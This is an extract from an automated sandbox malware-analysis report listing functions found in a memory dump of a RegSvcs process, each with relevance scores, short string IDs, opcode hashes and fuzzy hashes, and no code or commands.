                                            Function 031987E9 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'cq$4'cq
                                            • API String ID: 0-60795322
                                            • Opcode ID: 869222d911a53aa2b2e294e4869fb57914b392f181491dd98c0babc2c71bd753
                                            • Instruction ID: 9c5d215dc433f3a9442e1696235f2f3900e5c0762725f68c8cb225b48a3941b9
                                            • Opcode Fuzzy Hash: 869222d911a53aa2b2e294e4869fb57914b392f181491dd98c0babc2c71bd753
                                            • Instruction Fuzzy Hash: C1B15FB17141018FEF19DA28C958B39B69AEF8F605F1D04A7E113CF3A1EB25CC828752
                                            Function 031956A8 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq$Hgq
                                            • API String ID: 0-3391890871
                                            • Opcode ID: 3209b95f504d741c0f88671dcfd5c20c2baeab12cf6b305659a9f4b02819f05e
                                            • Instruction ID: c85c198fc7184d99df21d8dbecb515ea5e5cdc4f6b0b99c16e40bdefe9134f97
                                            • Opcode Fuzzy Hash: 3209b95f504d741c0f88671dcfd5c20c2baeab12cf6b305659a9f4b02819f05e
                                            • Instruction Fuzzy Hash: D3B1BD307042158FEF1ADF29C894B6E7BA7BF8E314F08446AE506DB294DB34D881C7A1
                                            Function 03195C08 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,gq$,gq
                                            • API String ID: 0-2533611571
                                            • Opcode ID: 6f7154e7210866b11a3126cbbb034aa9db522840529ca1ae4ca30cca12bb2576
                                            • Instruction ID: b626e53557fd1a71a7b595013c4d0cfbea6bf603af459031acfc2c17b2d41e90
                                            • Opcode Fuzzy Hash: 6f7154e7210866b11a3126cbbb034aa9db522840529ca1ae4ca30cca12bb2576
                                            • Instruction Fuzzy Hash: D3817E35A005058FEF1ADF69C88896AF7F7BF8E210B19816AD405FB365D731E841CB51
                                            Function 03193428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xgq$Xgq
                                            • API String ID: 0-2113765878
                                            • Opcode ID: 134f8c13c7337899d88b4cb66ecb753c0486a07e65a06e5fdb5f36db7b2287f1
                                            • Instruction ID: 6d1c3b326450819391426ab23d4790451d8086affd5c39a463387ac99f54cee5
                                            • Opcode Fuzzy Hash: 134f8c13c7337899d88b4cb66ecb753c0486a07e65a06e5fdb5f36db7b2287f1
                                            • Instruction Fuzzy Hash: B031C679B003258BFF2ED969599427FB7DAABCC610F19483BD826C7380DB74CC858661
                                            Function 03190C8F Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: bd9cd17c8e2775df4b17fbb85ba729ab8ce43d5c3b53a21b9fee11156dbd991f
                                            • Instruction ID: a01e31e513c6d1f2b9bf88ad6326e34bc719d046b69932e1720da6684f2409c7
                                            • Opcode Fuzzy Hash: bd9cd17c8e2775df4b17fbb85ba729ab8ce43d5c3b53a21b9fee11156dbd991f
                                            • Instruction Fuzzy Hash: 2E22C37490021ACFCB64EF64E984AAEBBB9FF4C300F1095A9D909A7318DB395D85CF51
                                            Function 03190CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: 76ff52a3703855d3af00067193bee0b80fd06824d792922d1386703c037c940a
                                            • Instruction ID: ffb16fe025c224b3e334cde916f019164af4b7f8d709f07cb7f9fed57f0572d7
                                            • Opcode Fuzzy Hash: 76ff52a3703855d3af00067193bee0b80fd06824d792922d1386703c037c940a
                                            • Instruction Fuzzy Hash: 4322C374A0021ACFCB64EF64E984AAEBBB9FF4C300F1095A9D909A7318DB355D85CF51
                                            Function 0319A650 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq
                                            • API String ID: 0-1855696158
                                            • Opcode ID: e0779c016521510732b2b15fe4c03b849456388c3843c19afa84c90bafa2ac3e
                                            • Instruction ID: d30a9dccf2e2ee3266235b493f94a19f2f6d2b23e4bfb7763294efc9d4167759
                                            • Opcode Fuzzy Hash: e0779c016521510732b2b15fe4c03b849456388c3843c19afa84c90bafa2ac3e
                                            • Instruction Fuzzy Hash: 9D41CE357002189FDB18EB68D854AAE7BFABFCD210F14446AD516EB391DF319C06CBA0
                                            Function 0319A818 Relevance: .4, Instructions: 411COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9c9af517bf47f395d9ec57707b031ae637a81c181ec9ba3f717a2f15915baf7
                                            • Instruction ID: c5644881b3e505dc9d471e87eea46a728f42891a138a07fd5d27dd8fdbddfcaf
                                            • Opcode Fuzzy Hash: e9c9af517bf47f395d9ec57707b031ae637a81c181ec9ba3f717a2f15915baf7
                                            • Instruction Fuzzy Hash: C8F11A75A005158FDB04DF6DC9849ADBBF6FF8C310B1A80AAE516AB361CB35EC85CB50
                                            Function 03197438 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24cd5cde411e63ff5d8af618cf30f406f98bc745d3a4fe9a33234fc855452816
                                            • Instruction ID: c04f67739e5062a07d63fbdbda1c4ba4748a109c30d8b354c71aba0eb8017762
                                            • Opcode Fuzzy Hash: 24cd5cde411e63ff5d8af618cf30f406f98bc745d3a4fe9a33234fc855452816
                                            • Instruction Fuzzy Hash: D471E834710205CFEF59DF29C898AA97BE5AF4D610F1940AAE906CB3B1DB70DC41CBA1
                                            Function 0319CEC7 Relevance: .2, Instructions: 172COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92e82b55ad4f26bd7a8b229196f84d0d80e95b5e78beaee6d399b5a56b95355a
                                            • Instruction ID: 5159526e0c9f247c328c2b27b1fd58b15fcf2c9478b036fd31cb1ac011de53d2
                                            • Opcode Fuzzy Hash: 92e82b55ad4f26bd7a8b229196f84d0d80e95b5e78beaee6d399b5a56b95355a
                                            • Instruction Fuzzy Hash: 1351BD7402634B8FC34C3F21B9AC12ABBA5FB4F3277457D54E04E9582EAB345489CA31
                                            Function 0319CED8 Relevance: .2, Instructions: 167COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 564ed56b664ab2cbb16883534c8b5c84f97cbfe0e2e27cc56dfee33f9ddba21e
                                            • Instruction ID: 69ac7f7c406f3a5ad310a960351eb68636e1b990a8cb3e2cfad6f5e453c94d26
                                            • Opcode Fuzzy Hash: 564ed56b664ab2cbb16883534c8b5c84f97cbfe0e2e27cc56dfee33f9ddba21e
                                            • Instruction Fuzzy Hash: C0518DB402234B8FC64C3F25B6AC12ABBA5FB4F3277457D54F04E9182EAB3454858E31
                                            Function 031938F9 Relevance: .1, Instructions: 144COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ab4f21fff5ae7df766586e7a6c182a5f1ca729fcc6af3b1d7fb112183faa176
                                            • Instruction ID: 17b84dcd5396421f5447ade72bda2faedfa1da4e1e1d6813dc16a7effe8e57de
                                            • Opcode Fuzzy Hash: 0ab4f21fff5ae7df766586e7a6c182a5f1ca729fcc6af3b1d7fb112183faa176
                                            • Instruction Fuzzy Hash: 3F51B878E01208DFCB58DFA9D99099EBBB6FF8D300B209469E905AB324D735AD41CF40
                                            Function 0319CD10 Relevance: .1, Instructions: 141COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91f508b4578cfe4b0ef2c6e0b90722c7f9afd7dc92470c2d663e009e4119bae4
                                            • Instruction ID: 3adb167e20ffa1af3fa11f5acae2b80093da1d1d39508db84e4956776f1496b2
                                            • Opcode Fuzzy Hash: 91f508b4578cfe4b0ef2c6e0b90722c7f9afd7dc92470c2d663e009e4119bae4
                                            • Instruction Fuzzy Hash: 1D518374E01208DFDB54DFA9D9849DDBBF2BF89300F24916AE819AB364DB31A901CF50
                                            Function 03193908 Relevance: .1, Instructions: 134COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51ff10910f71ae11260d194b73cd8e381ef092a0d14e157655da7bdc2110b647
                                            • Instruction ID: e5de48a7f4d17e985bb6a34f869d727fe657fa85971a96febaaae35d7974f59e
                                            • Opcode Fuzzy Hash: 51ff10910f71ae11260d194b73cd8e381ef092a0d14e157655da7bdc2110b647
                                            • Instruction Fuzzy Hash: 5C519574E01208CFCB58DFA9D99499EBBB2FF8D311B209469E505AB364DB35AC45CF40
                                            Function 03199A63 Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e04cde9ace074af6ee0098d3c9cc450c7858fd8197ef959a3213df0cbf3a203
                                            • Instruction ID: 2a83793964965ade31e2219eb62a162c54843b39e2fcc29fb91b08faa0df22fd
                                            • Opcode Fuzzy Hash: 8e04cde9ace074af6ee0098d3c9cc450c7858fd8197ef959a3213df0cbf3a203
                                            • Instruction Fuzzy Hash: 9B419331A04249DFEF15CFA4C844A9DBFB6FF4E310F04859AE8169B291E334D950CBA0
                                            Function 03194DC8 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dde532317559284114df8a74b9e5411b3b72166c080b687a24fe86be0651ef3
                                            • Instruction ID: f16a4927901509363ceeceadd239da85b9d5954740f5173d5c3a1584c1481cad
                                            • Opcode Fuzzy Hash: 1dde532317559284114df8a74b9e5411b3b72166c080b687a24fe86be0651ef3
                                            • Instruction Fuzzy Hash: E331803160420AAFDF05DF65D894AAE3BA6FF8C300F044469F9159B250DF39DC62CBA0
                                            Function 031976D0 Relevance: .1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4b0246c7ea9955eb3f486fa559b57d2b98cf4a55f20bc09c66f41f944fe102d
                                            • Instruction ID: 27e0f228faa1adbd67d8a2e32153d65a3265c930cb653cab6dca2a9574396c8b
                                            • Opcode Fuzzy Hash: e4b0246c7ea9955eb3f486fa559b57d2b98cf4a55f20bc09c66f41f944fe102d
                                            • Instruction Fuzzy Hash: 0121D3363242015BFF1EA6398C9CA39369BAFCD614B1840A7D506CB7D5EF25CC82D292
                                            Function 0319A809 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b34e2e5750486b57ae53ee191d536be10531818330a9ccc91c00683922a5e5a3
                                            • Instruction ID: c3f55d128f9fde7620da11c0dc8673060c2a6ebd0ba38ac16327c007f6156542
                                            • Opcode Fuzzy Hash: b34e2e5750486b57ae53ee191d536be10531818330a9ccc91c00683922a5e5a3
                                            • Instruction Fuzzy Hash: 32319270E005158FDF04CF6DC8889AEBBBAFF89310B15815AE5169B3A5C730EC46CB90
                                            Function 031976E0 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e650e378052d79eed8509d5e72a76ca7df9f06da8048a9ff30cedd2be2a966e7
                                            • Instruction ID: 28f09547a53b30f6dbda7d48c637423fc5ca95b8ed617162487e51558e62b676
                                            • Opcode Fuzzy Hash: e650e378052d79eed8509d5e72a76ca7df9f06da8048a9ff30cedd2be2a966e7
                                            • Instruction Fuzzy Hash: 4421A13632420557FF1DA6258C9CA7A369BAFCC618F1840BAD506CB7D8EF25CC829391
                                            Function 03194DBB Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67036c73281a6432656e4a358323582a33410e311ecb4ee964fb937c90074d6f
                                            • Instruction ID: 07f80b456b61b1f30ab60536611db7cc3b29739b68103352b71e371d3274a36c
                                            • Opcode Fuzzy Hash: 67036c73281a6432656e4a358323582a33410e311ecb4ee964fb937c90074d6f
                                            • Instruction Fuzzy Hash: E531B4356041098FDF18DF65E984BAA7BB6FF8C710F1040A9E5059B254DF38DD62CBA0
                                            Function 03192060 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fae4a6b1db53e8c351569347f41d7596e45666ab79649628cd100fe38716a3e8
                                            • Instruction ID: 555f2c82e4cc5112882a29e75f97299a4c338f2ee00edc7f9915161ddffd9374
                                            • Opcode Fuzzy Hash: fae4a6b1db53e8c351569347f41d7596e45666ab79649628cd100fe38716a3e8
                                            • Instruction Fuzzy Hash: 6121E531A00209AFCF14DF24D9409AF77B9EB8C360F15C85AD9098B254EB35EE46CBD1
                                            Function 0319D218 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92bcf2c4d84bbce1b894258044d81e0a34652a54c9b5d2ffcf8e71ec7565d2c1
                                            • Instruction ID: 9e7837edfcb061e6882fe8cfe9863d8eee7165234ffe817cb71d17cf9329bba6
                                            • Opcode Fuzzy Hash: 92bcf2c4d84bbce1b894258044d81e0a34652a54c9b5d2ffcf8e71ec7565d2c1
                                            • Instruction Fuzzy Hash: 092109349012098FDF08DFB0E850AEEB7B6FB8E301F10A569D911773A4CB399942CE64
                                            Function 0319D11F Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32ecbd312c8356ada25f8f80eb7751cb1ec2e6488c5ffce4f291b82b9b7ee449
                                            • Instruction ID: 545290127cfa34edf59faf970099c672d622d9cb3c2b93b949427034dce955c2
                                            • Opcode Fuzzy Hash: 32ecbd312c8356ada25f8f80eb7751cb1ec2e6488c5ffce4f291b82b9b7ee449
                                            • Instruction Fuzzy Hash: 90212531C112198ECF10EFE8E9446ECFBB4FF5A301F109629E40577258EB346A8ACB90
                                            Function 03195A70 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2359b58897567ec2da9241bb6efb78025804141642a11f262d1916dc265e6f4
                                            • Instruction ID: b4e4b83ffbf40dbb210e3d2d390949be4b771bd3a1ef99a71b51d9cab69d282d
                                            • Opcode Fuzzy Hash: f2359b58897567ec2da9241bb6efb78025804141642a11f262d1916dc265e6f4
                                            • Instruction Fuzzy Hash: 1921A1357016128BDB2ADA29C49452EB3A7FFCD660B09416AE806EB354DF34DC0287D0
                                            Function 0319215C Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acb79afdc43584ad995325e65d776cf7daec7aec8129cec6d4d18fec18438937
                                            • Instruction ID: eb772e8fa25e00698b9316e1f45f6327d892bc09c85800db6a1c9463543d539b
                                            • Opcode Fuzzy Hash: acb79afdc43584ad995325e65d776cf7daec7aec8129cec6d4d18fec18438937
                                            • Instruction Fuzzy Hash: A1112C31E0834D9FCB02DBB89C108DEBB34EF892107258797D566B7191E6315906C361
                                            Function 031939ED Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61742a97b8b2e8dc8aa214f29e75c89ae175bcbbd573b7c794b54cea4e77bb33
                                            • Instruction ID: 98d7b0139c2e5105a0d9550d2ef1a9f69997f7c33a54b7dbf65a52c2525e9a4d
                                            • Opcode Fuzzy Hash: 61742a97b8b2e8dc8aa214f29e75c89ae175bcbbd573b7c794b54cea4e77bb33
                                            • Instruction Fuzzy Hash: 0731A978E01208CFCB54DFA4E9948ADBBB6FF4D300B20545AE505AB324D735AD45CF40
                                            Function 0319D228 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0b7c174f24d86ae67194b4fbdb6269f747a9168c7f7894b88fb3c32caa620d6
                                            • Instruction ID: aee9f7410aba0aac69c97ca29909be1573e750a89fbdcebb72dfec42d5750aa8
                                            • Opcode Fuzzy Hash: a0b7c174f24d86ae67194b4fbdb6269f747a9168c7f7894b88fb3c32caa620d6
                                            • Instruction Fuzzy Hash: 382106349012098FCB08DFB4E850AEEB7B6FB8E301F10A569D405733A4DB3AA945CE64
                                            Function 03191F08 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d15ca85a13faf837cb636f9586f092126740741b7f2a9e44f0501e99a28f33d
                                            • Instruction ID: 37281c05eb0972c36e2a6ed6f71d44dcf3e9a92d513cce29cfb80af58e7340a5
                                            • Opcode Fuzzy Hash: 4d15ca85a13faf837cb636f9586f092126740741b7f2a9e44f0501e99a28f33d
                                            • Instruction Fuzzy Hash: 3921F0B4C0520A8FDB15EFA8C9445EEBFB4FF49300F1441AAD845B7265EB311A89CBA1
                                            Function 03191F61 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17df7264a8b8c7eab1f2eb7fef03e82a1e6d92c602e642e383c609c3a409fd72
                                            • Instruction ID: 1365ebd74990c3296a104a70e42580e184e344059f883d2895c333d32f5ffaab
                                            • Opcode Fuzzy Hash: 17df7264a8b8c7eab1f2eb7fef03e82a1e6d92c602e642e383c609c3a409fd72
                                            • Instruction Fuzzy Hash: 3C21EEB4C0524E8FCF48EFA8D9455EEBBF4BB4D301F10416AD805B2214EB341A89CBA1
                                            Function 03195607 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04e5e827f0d5e000996bfa0bc7d0c436289dd9ab1c3d740430836dbdbe1321ef
                                            • Instruction ID: 0009bece3ee148bdc9afdccff28b35b7061bb42f06fd1829e27e9224405d8e58
                                            • Opcode Fuzzy Hash: 04e5e827f0d5e000996bfa0bc7d0c436289dd9ab1c3d740430836dbdbe1321ef
                                            • Instruction Fuzzy Hash: 1001D6317041196FDF06DE5998106EE3BE7EFCE250B198027F915EB290DB71C80287A1
                                            Function 03192010 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5dd0861a3c4671f6a0671169bc3cf0bb62ca43de339b28b2d4c5dc7936454f9c
                                            • Instruction ID: 9f57daa98a9c6218fb589cbc1a53133137f9fcb3964c2ec165a5bb1bd0521330
                                            • Opcode Fuzzy Hash: 5dd0861a3c4671f6a0671169bc3cf0bb62ca43de339b28b2d4c5dc7936454f9c
                                            • Instruction Fuzzy Hash: 1FE09236C2436E5BCF05DBA4D8048DEFB38EE97210B5A4A97D5206B056E770254AC7A1
                                            Function 03192020 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 747671b012b5b6d19f25321be5313bc35b41c1f34affe8e6fd7985e0ac8a63e7
                                            • Instruction ID: db8cfe9a5269b80211ebb607dba456c0403f579192cc5d7d749a334f38f8a52d
                                            • Opcode Fuzzy Hash: 747671b012b5b6d19f25321be5313bc35b41c1f34affe8e6fd7985e0ac8a63e7
                                            • Instruction Fuzzy Hash: F6D01231D2022B968B00A6A5DC044DEB739EE96261B544626D52437154EB70265986E1
                                            Function 03198258 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: 1826336df12948c88dc51e4314582fa8b246bfe209e45ebaa5217ebd32488553
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
